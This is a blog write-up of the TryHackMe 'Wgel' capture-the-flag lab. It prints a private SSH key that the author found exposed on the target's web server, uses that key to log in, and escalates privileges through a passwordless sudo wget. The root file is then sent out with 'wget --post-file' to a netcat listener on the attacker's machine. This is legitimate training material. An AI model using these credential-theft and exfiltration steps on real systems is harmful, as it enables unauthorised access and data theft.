<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
    <meta name="description" content="Hey there! Today I am going to walk you through the Wgel machine on TryHackMe The first thing I always do is to export the IP to a global variable. So from now on $IP will refer to the IP of the targe">
<meta property="og:type" content="article">
<meta property="og:title" content="Wgel - TryHackMe">
<meta property="og:url" content="http://therealriyad1.github.io/2020/08/07/Wgel-TryHackMe/">
<meta property="og:site_name" content="therealriyad1">
<meta property="og:description" content="Hey there! Today I am going to walk you through the Wgel machine on TryHackMe The first thing I always do is to export the IP to a global variable. So from now on $IP will refer to the IP of the targe">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2020-08-07T16:04:55.000Z">
<meta property="article:modified_time" content="2020-08-07T17:08:26.262Z">
<meta property="article:author" content="therealriyad1">
<meta name="twitter:card" content="summary">
    
    
        
          
              <link rel="shortcut icon" href="/images/favicon.ico">
          
        
        
          
            <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
          
        
        
          
            <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
          
        
    
    <!-- title -->
    <title>Wgel - TryHackMe</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
      
<link rel="stylesheet" href="/css/rtl.css">

    
    <!-- rss -->
    
    
<meta name="generator" content="Hexo 4.2.1"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/archives/">Archive</a></li>
         
          <li><a href="/search/">Search</a></li>
        
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" href="/2020/08/13/Anonymous-TryHackMe/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" href="/2020/07/11/Dogcat-TryHackMe/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=http://therealriyad1.github.io/2020/08/07/Wgel-TryHackMe/" target="_blank" rel="noopener"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=http://therealriyad1.github.io/2020/08/07/Wgel-TryHackMe/&text=Wgel - TryHackMe" target="_blank" rel="noopener"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=http://therealriyad1.github.io/2020/08/07/Wgel-TryHackMe/&title=Wgel - TryHackMe" target="_blank" rel="noopener"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=http://therealriyad1.github.io/2020/08/07/Wgel-TryHackMe/&is_video=false&description=Wgel - TryHackMe" target="_blank" rel="noopener"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Wgel - TryHackMe&body=Check out this article: http://therealriyad1.github.io/2020/08/07/Wgel-TryHackMe/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=http://therealriyad1.github.io/2020/08/07/Wgel-TryHackMe/&title=Wgel - TryHackMe" target="_blank" rel="noopener"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=http://therealriyad1.github.io/2020/08/07/Wgel-TryHackMe/&title=Wgel - TryHackMe" target="_blank" rel="noopener"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=http://therealriyad1.github.io/2020/08/07/Wgel-TryHackMe/&title=Wgel - TryHackMe" target="_blank" rel="noopener"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=http://therealriyad1.github.io/2020/08/07/Wgel-TryHackMe/&title=Wgel - TryHackMe" target="_blank" rel="noopener"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=http://therealriyad1.github.io/2020/08/07/Wgel-TryHackMe/&name=Wgel - TryHackMe&description=" target="_blank" rel="noopener"><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://news.ycombinator.com/submitlink?u=http://therealriyad1.github.io/2020/08/07/Wgel-TryHackMe/&t=Wgel - TryHackMe" target="_blank" rel="noopener"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Enumeration"><span class="toc-number">1.</span> <span class="toc-text">Enumeration</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Gaining-Access"><span class="toc-number">2.</span> <span class="toc-text">Gaining Access</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#User-Flag"><span class="toc-number">2.1.</span> <span class="toc-text">User Flag</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Post-Exploitation-amp-Getting-Root"><span class="toc-number">3.</span> <span class="toc-text">Post Exploitation &amp; Getting Root</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Root-Flag"><span class="toc-number">3.1.</span> <span class="toc-text">Root Flag</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#The-End"><span class="toc-number">4.</span> <span class="toc-text">The End</span></a></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        Wgel - TryHackMe
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">therealriyad1</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2020-08-07T16:04:55.000Z" itemprop="datePublished">2020-08-07</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fas fa-archive"></i>
        <a class="category-link" href="/categories/pentesting/">pentesting</a> › <a class="category-link" href="/categories/pentesting/writeups/">writeups</a>
    </div>


      

    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <p>Hey there! Today I am going to walk you through the Wgel machine on <a href="https://tryhackme.com/room/wgelctf" target="_blank" rel="noopener">TryHackMe</a></p>
<p>The first thing I always do is to export the IP to a global variable. So from now on $IP will refer to the IP of the target machine.</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">export</span> IP=&#123;Machine IP&#125;</span><br></pre></td></tr></table></figure>

<h2 id="Enumeration"><a href="#Enumeration" class="headerlink" title="Enumeration"></a>Enumeration</h2><p>Let us start our enumeration as usual and do an nmap scan:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nmap -T4 -A <span class="variable">$IP</span></span><br></pre></td></tr></table></figure>

<p>This is what came back:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line">Starting Nmap 7.80 ( https:&#x2F;&#x2F;nmap.org ) at 2020-08-07 09:47 EDT</span><br><span class="line">Nmap scan report for 10.10.54.255</span><br><span class="line">Host is up (0.051s latency).</span><br><span class="line">Not shown: 998 closed ports</span><br><span class="line">PORT   STATE SERVICE VERSION</span><br><span class="line">22&#x2F;tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)</span><br><span class="line">| ssh-hostkey:</span><br><span class="line">|   2048 94:96:1b:66:80:1b:76:48:68:2d:14:b5:9a:01:aa:aa (RSA)</span><br><span class="line">|   256 18:f7:10:cc:5f:40:f6:cf:92:f8:69:16:e2:48:f4:38 (ECDSA)</span><br><span class="line">|_  256 b9:0b:97:2e:45:9b:f3:2a:4b:11:c7:83:10:33:e0:ce (ED25519)</span><br><span class="line">80&#x2F;tcp open  http    Apache httpd 2.4.18 ((Ubuntu))</span><br><span class="line">|_http-server-header: Apache&#x2F;2.4.18 (Ubuntu)</span><br><span class="line">|_http-title: Apache2 Ubuntu Default Page: It works</span><br><span class="line">No exact OS matches for host (If you know what OS is running on it, see https:&#x2F;&#x2F;nmap.org&#x2F;submit&#x2F; ).</span><br><span class="line">TCP&#x2F;IP fingerprint:</span><br><span class="line">OS:SCAN(V&#x3D;7.80%E&#x3D;4%D&#x3D;8&#x2F;7%OT&#x3D;22%CT&#x3D;1%CU&#x3D;42515%PV&#x3D;Y%DS&#x3D;2%DC&#x3D;T%G&#x3D;Y%TM&#x3D;5F2D5B8F</span><br><span class="line">OS:%P&#x3D;x86_64-pc-linux-gnu)SEQ(SP&#x3D;105%GCD&#x3D;1%ISR&#x3D;10C%TI&#x3D;Z%CI&#x3D;RD%TS&#x3D;A)SEQ(SP&#x3D;1</span><br><span class="line">OS:05%GCD&#x3D;1%ISR&#x3D;10C%TI&#x3D;Z%CI&#x3D;I%II&#x3D;I%TS&#x3D;A)OPS(O1&#x3D;M508ST11NW6%O2&#x3D;M508ST11NW6%O</span><br><span class="line">OS:3&#x3D;M508NNT11NW6%O4&#x3D;M508ST11NW6%O5&#x3D;M508ST11NW6%O6&#x3D;M508ST11)WIN(W1&#x3D;68DF%W2&#x3D;</span><br><span class="line">OS:68DF%W3&#x3D;68DF%W4&#x3D;68DF%W5&#x3D;68DF%W6&#x3D;68DF)ECN(R&#x3D;Y%DF&#x3D;Y%T&#x3D;40%W&#x3D;6903%O&#x3D;M508NNSN</span><br><span class="line">OS:W6%CC&#x3D;Y%Q&#x3D;)T1(R&#x3D;Y%DF&#x3D;Y%T&#x3D;40%S&#x3D;O%A&#x3D;S+%F&#x3D;AS%RD&#x3D;0%Q&#x3D;)T2(R&#x3D;N)T3(R&#x3D;N)T4(R&#x3D;Y%D</span><br><span class="line">OS:F&#x3D;Y%T&#x3D;40%W&#x3D;0%S&#x3D;A%A&#x3D;Z%F&#x3D;R%O&#x3D;%RD&#x3D;0%Q&#x3D;)T5(R&#x3D;Y%DF&#x3D;Y%T&#x3D;40%W&#x3D;0%S&#x3D;Z%A&#x3D;S+%F&#x3D;AR%O</span><br><span class="line">OS:&#x3D;%RD&#x3D;0%Q&#x3D;)T6(R&#x3D;Y%DF&#x3D;Y%T&#x3D;40%W&#x3D;0%S&#x3D;A%A&#x3D;Z%F&#x3D;R%O&#x3D;%RD&#x3D;0%Q&#x3D;)T7(R&#x3D;Y%DF&#x3D;Y%T&#x3D;40%W</span><br><span class="line">OS:&#x3D;0%S&#x3D;Z%A&#x3D;S+%F&#x3D;AR%O&#x3D;%RD&#x3D;0%Q&#x3D;)U1(R&#x3D;Y%DF&#x3D;N%T&#x3D;40%IPL&#x3D;164%UN&#x3D;0%RIPL&#x3D;G%RID&#x3D;G%R</span><br><span class="line">OS:IPCK&#x3D;G%RUCK&#x3D;G%RUD&#x3D;G)IE(R&#x3D;Y%DFI&#x3D;N%T&#x3D;40%CD&#x3D;S)</span><br><span class="line"></span><br><span class="line">Network Distance: 2 hops</span><br><span class="line">Service Info: OS: Linux; CPE: cpe:&#x2F;o:linux:linux_kernel</span><br><span class="line"></span><br><span class="line">TRACEROUTE (using port 1720&#x2F;tcp)</span><br><span class="line">HOP RTT      ADDRESS</span><br><span class="line">1   52.28 ms 10.9.0.1</span><br><span class="line">2   52.35 ms 10.10.54.255</span><br><span class="line"></span><br><span class="line">OS and Service detection performed. Please report any incorrect results at https:&#x2F;&#x2F;nmap.org&#x2F;submit&#x2F; .</span><br><span class="line">Nmap done: 1 IP address (1 host up) scanned in 23.73 seconds</span><br></pre></td></tr></table></figure>

<p>So just SSH on port 22 and Apache on port 80. Let us first do some enumeration on the web server.<br>On first glance there is just the Apache default page. If we have a look at the source code we can see that there is a comment inside:</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">&lt;!-- Jessie don't forget to udate the webiste --&gt;</span></span><br></pre></td></tr></table></figure>

<p>Apparently someone called Jessie is a developer or user of the target machine.</p>
<p>But let us run dirbuster and see if there is more to find.</p>
<p>At <strong>/sitemap/</strong> there is a blog like website with the title “unapp” but I did not find anything interesting there nor any exploits. So let us move on.</p>
<p>Weirdly my scan did not find anything, but I poked around a bit more and just tried random directories and files. So I stumbled upon this: <strong>/sitemap/.ssh/id_rsa</strong>.</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line">-----BEGIN RSA PRIVATE KEY-----</span><br><span class="line">MIIEowIBAAKCAQEA2mujeBv3MEQFCel8yvjgDz066+8Gz0W72HJ5tvG8bj7Lz380</span><br><span class="line">m+JYAquy30lSp5jH&#x2F;bhcvYLsK+T9zEdzHmjKDtZN2cYgwHw0dDadSXWFf9W2gc3x</span><br><span class="line">W69vjkHLJs+lQi0bEJvqpCZ1rFFSpV0OjVYRxQ4KfAawBsCG6lA7GO7vLZPRiKsP</span><br><span class="line">y4lg2StXQYuZ0cUvx8UkhpgxWy&#x2F;OO9ceMNondU61kyHafKobJP7Py5QnH7cP&#x2F;psr</span><br><span class="line">+J5M&#x2F;fVBoKPcPXa71mA&#x2F;ZUioimChBPV&#x2F;i&#x2F;0za0FzVuJZdnSPtS7LzPjYFqxnm&#x2F;BH</span><br><span class="line">Wo&#x2F;Lmln4FLzLb1T31pOoTtTKuUQWxHf7cN8v6QIDAQABAoIBAFZDKpV2HgL+6iqG</span><br><span class="line">&#x2F;1U+Q2dhXFLv3PWhadXLKEzbXfsAbAfwCjwCgZXUb9mFoNI2Ic4PsPjbqyCO2LmE</span><br><span class="line">AnAhHKQNeUOn3ymGJEU9iJMJigb5xZGwX0FBoUJCs9QJMBBZthWyLlJUKic7GvPa</span><br><span class="line">M7QYKP51VCi1j3GrOd1ygFSRkP6jZpOpM33dG1&#x2F;ubom7OWDZPDS9AjAOkYuJBobG</span><br><span class="line">SUM+uxh7JJn8uM9J4NvQPkC10RIXFYECwNW+iHsB0CWlcF7CAZAbWLsJgd6TcGTv</span><br><span class="line">2KBA6YcfGXN0b49CFOBMLBY&#x2F;dcWpHu+d0KcruHTeTnM7aLdrexpiMJ3XHVQ4QRP2</span><br><span class="line">p3xz9QECgYEA+VXndZU98FT+armRv8iwuCOAmN8p7tD1W9S2evJEA5uTCsDzmsDj</span><br><span class="line">7pUO8zziTXgeDENrcz1uo0e3bL13MiZeFe9HQNMpVOX+vEaCZd6ZNFbJ4R889D7I</span><br><span class="line">dcXDvkNRbw42ZWx8TawzwXFVhn8Rs9fMwPlbdVh9f9h7papfGN2FoeECgYEA4EIy</span><br><span class="line">GW9eJnl0tzL31TpW2lnJ+KYCRIlucQUnBtQLWdTncUkm+LBS5Z6dGxEcwCrYY1fh</span><br><span class="line">shl66KulTmE3G9nFPKezCwd7jFWmUUK0hX6Sog7VRQZw72cmp7lYb1KRQ9A0Nb97</span><br><span class="line">uhgbVrK&#x2F;Rm+uACIJ+YD57&#x2F;ZuwuhnJPirXwdaXwkCgYBMkrxN2TK3f3LPFgST8K+N</span><br><span class="line">LaIN0OOQ622e8TnFkmee8AV9lPp7eWfG2tJHk1gw0IXx4Da8oo466QiFBb74kN3u</span><br><span class="line">QJkSaIdWAnh0G&#x2F;dqD63fbBP95lkS7cEkokLWSNhWkffUuDeIpy0R6JuKfbXTFKBW</span><br><span class="line">V35mEHIidDqtCyC&#x2F;gzDKIQKBgDE+d+&#x2F;b46nBK976oy9AY0gJRW+DTKYuI4FP51T5</span><br><span class="line">hRCRzsyyios7dMiVPtxtsomEHwYZiybnr3SeFGuUr1w&#x2F;Qq9iB8&#x2F;ZMckMGbxoUGmr</span><br><span class="line">9Jj&#x2F;dtd0ZaI8XWGhMokncVyZwI044ftoRcCQ+a2G4oeG8ffG2ZtW2tWT4OpebIsu</span><br><span class="line">eyq5AoGBANCkOaWnitoMTdWZ5d+WNNCqcztoNppuoMaG7L3smUSBz6k8J4p4yDPb</span><br><span class="line">QNF1fedEOvsguMlpNgvcWVXGINgoOOUSJTxCRQFy&#x2F;onH6X1T5OAAW6&#x2F;UXc4S7Vsg</span><br><span class="line">jL8g9yBg4vPB8dHC6JeJpFFE06vxQMFzn6vjEab9GhnpMihrSCod</span><br><span class="line">-----END RSA PRIVATE KEY-----</span><br></pre></td></tr></table></figure>

<p>It is an SSH private key you can use to login to someones SSH.<br>I went ahead and copied the key to a file called <strong>id_rsa</strong> and gave it the permissions SSH likes.</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">chmod 600 id_rsa</span><br></pre></td></tr></table></figure>

<h2 id="Gaining-Access"><a href="#Gaining-Access" class="headerlink" title="Gaining Access"></a>Gaining Access</h2><p>Now we can use that previously found key to login to SSH. The only thing we are missing is a user to map that key to. In this case the server would be even vulnerable to an exploit to enumerate all the users on a server, but because we found something for “Jessie” earlier, I assumed, that the key was Jessie’s.<br>So let’s login as Jessie with the private key.</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ssh -i id_rsa  jessie@<span class="variable">$IP</span></span><br></pre></td></tr></table></figure>

<h3 id="User-Flag"><a href="#User-Flag" class="headerlink" title="User Flag"></a>User Flag</h3><p>The user flag was hidden inside of the “Documents” directory.</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">therealriyad@ubuntu:~▶ ls</span><br><span class="line">Desktop  Documents  Downloads  examples.desktop  Music  Pictures  Public  Templates  Videos</span><br><span class="line">therealriyad@ubuntu:~▶ <span class="built_in">cd</span> Desktop/</span><br><span class="line">therealriyad@ubuntu:~▶~/Desktop$ ls</span><br><span class="line">therealriyad@ubuntu:~▶~/Desktop$ <span class="built_in">cd</span> ..</span><br><span class="line">therealriyad@ubuntu:~▶ <span class="built_in">cd</span> Documents/</span><br><span class="line">therealriyad@ubuntu:~▶~/Documents$ ls</span><br><span class="line">user_flag.txt</span><br><span class="line">therealriyad@ubuntu:~▶~/Documents$ cat user_flag.txt</span><br><span class="line">USER_FLAG</span><br></pre></td></tr></table></figure>

<h2 id="Post-Exploitation-amp-Getting-Root"><a href="#Post-Exploitation-amp-Getting-Root" class="headerlink" title="Post Exploitation &amp; Getting Root"></a>Post Exploitation &amp; Getting Root</h2><p>Before uploading linpeas or anything else I fancied, I just had a look at our sudo permissions.</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">therealriyad@ubuntu:~▶~&#x2F;Documents$ sudo -l</span><br><span class="line">Matching Defaults entries for jessie on CorpOne:</span><br><span class="line">    env_reset, mail_badpass, secure_path&#x3D;&#x2F;usr&#x2F;local&#x2F;sbin\:&#x2F;usr&#x2F;local&#x2F;bin\:&#x2F;usr&#x2F;sbin\:&#x2F;usr&#x2F;bin\:&#x2F;sbin\:&#x2F;bin\:&#x2F;snap&#x2F;bin</span><br><span class="line"></span><br><span class="line">User jessie may run the following commands on CorpOne:</span><br><span class="line">    (ALL : ALL) ALL</span><br><span class="line">    (root) NOPASSWD: &#x2F;usr&#x2F;bin&#x2F;wget</span><br></pre></td></tr></table></figure>

<p>Interesting, apparently we can run <strong>wget</strong> as root without a password. So as always I had a look at <a href="https://gtfobins.github.io/" target="_blank" rel="noopener">GTFOBins</a> and found <a href="https://gtfobins.github.io/gtfobins/wget/" target="_blank" rel="noopener">this</a> for wget.</p>
<h3 id="Root-Flag"><a href="#Root-Flag" class="headerlink" title="Root Flag"></a>Root Flag</h3><p>It seems like we can download files to another machine. We can use that knowledge to directly exfiltrate the root flag.<br>(Trust me it took me ages to figure that one out. I first tried to download /etc/shadow and simliar.)</p>
<p>So on my machine I listened for incoming connections on port 80 and stored the output in a file called “root_flag.txt”:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">root@hades~▶      :~/ctf/thm/wgel<span class="comment"># nc -lnvp 80 &gt; root_flag.txt</span></span><br><span class="line">Ncat: Version 7.80 ( https://nmap.org/ncat )</span><br><span class="line">Ncat: Listening on :::80</span><br><span class="line">Ncat: Listening on 0.0.0.0:80</span><br><span class="line">Ncat: Connection from 10.10.54.255.</span><br><span class="line">Ncat: Connection from 10.10.54.255:36442.</span><br></pre></td></tr></table></figure>

<p>On the target machine I used wget with the “–post-file” flag to send the root flag to my machine.</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">therealriyad@ubuntu:~▶~/Documents$ sudo /usr/bin/wget --post-file=/root/root_flag.txt <span class="variable">$YOUR_IP</span></span><br><span class="line">--2020-08-07 18:11:21--  http://<span class="variable">$YOUR_IP</span>/</span><br><span class="line">Connecting to <span class="variable">$YOUR_IP</span>:80... connected.</span><br><span class="line">HTTP request sent, awaiting response...</span><br></pre></td></tr></table></figure>

<p>You should now be able to cat out the root flag in the “root_flag.txt” file.</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">root@hades:~▶~/ctf/thm/wgel<span class="comment"># cat root_flag.txt</span></span><br><span class="line">ROOT_FLAG</span><br></pre></td></tr></table></figure>

<h2 id="The-End"><a href="#The-End" class="headerlink" title="The End"></a>The End</h2><p>And there you have it! I hope you had fun, I know I did 🦄</p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/archives/">Archive</a></li>
         
          <li><a href="/search/">Search</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Enumeration"><span class="toc-number">1.</span> <span class="toc-text">Enumeration</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Gaining-Access"><span class="toc-number">2.</span> <span class="toc-text">Gaining Access</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#User-Flag"><span class="toc-number">2.1.</span> <span class="toc-text">User Flag</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Post-Exploitation-amp-Getting-Root"><span class="toc-number">3.</span> <span class="toc-text">Post Exploitation &amp; Getting Root</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Root-Flag"><span class="toc-number">3.1.</span> <span class="toc-text">Root Flag</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#The-End"><span class="toc-number">4.</span> <span class="toc-text">The End</span></a></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=http://therealriyad1.github.io/2020/08/07/Wgel-TryHackMe/" target="_blank" rel="noopener"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=http://therealriyad1.github.io/2020/08/07/Wgel-TryHackMe/&text=Wgel - TryHackMe" target="_blank" rel="noopener"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=http://therealriyad1.github.io/2020/08/07/Wgel-TryHackMe/&title=Wgel - TryHackMe" target="_blank" rel="noopener"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=http://therealriyad1.github.io/2020/08/07/Wgel-TryHackMe/&is_video=false&description=Wgel - TryHackMe" target="_blank" rel="noopener"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Wgel - TryHackMe&body=Check out this article: http://therealriyad1.github.io/2020/08/07/Wgel-TryHackMe/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=http://therealriyad1.github.io/2020/08/07/Wgel-TryHackMe/&title=Wgel - TryHackMe" target="_blank" rel="noopener"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=http://therealriyad1.github.io/2020/08/07/Wgel-TryHackMe/&title=Wgel - TryHackMe" target="_blank" rel="noopener"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=http://therealriyad1.github.io/2020/08/07/Wgel-TryHackMe/&title=Wgel - TryHackMe" target="_blank" rel="noopener"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=http://therealriyad1.github.io/2020/08/07/Wgel-TryHackMe/&title=Wgel - TryHackMe" target="_blank" rel="noopener"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=http://therealriyad1.github.io/2020/08/07/Wgel-TryHackMe/&name=Wgel - TryHackMe&description=" target="_blank" rel="noopener"><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://news.ycombinator.com/submitlink?u=http://therealriyad1.github.io/2020/08/07/Wgel-TryHackMe/&t=Wgel - TryHackMe" target="_blank" rel="noopener"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2020
    therealriyad1
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/about/">About</a></li>
